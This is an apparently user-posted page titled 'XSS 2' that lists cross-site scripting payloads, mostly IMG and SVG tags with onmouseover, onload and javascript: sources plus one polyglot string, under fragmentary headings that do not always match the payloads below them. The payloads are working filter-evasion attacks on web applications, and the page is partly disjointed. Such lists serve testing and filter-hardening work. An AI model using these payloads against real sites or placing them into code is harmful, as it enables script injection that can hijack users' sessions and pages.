XSS 2

By @guest4test 6/3/2024


If iFrames are allowed, there are a lot of other XSS problems as well:

iFrames and most other elements can use event-based mayhem like the following:

Frames have the same sorts of XSS problems as iFrames

Bang

javascript:/*--><svg/onload='+/"`/+/onmouseover=1/+/[*/[]/+alert(42);//'>

<IMG """>">

Default SRC Tag by Leaving it Empty

<IMG SRC= onmouseover="alert('xxs')">

Default SRC Tag by Leaving it out Entirely

On Error Alert

IMG onerror and JavaScript Alert Encode

<IMG SRC=javascript:alert("XSS")>

<IMG SRC="<javascript:alert>('XSS')"


<svg/onload=alert('XSS')>
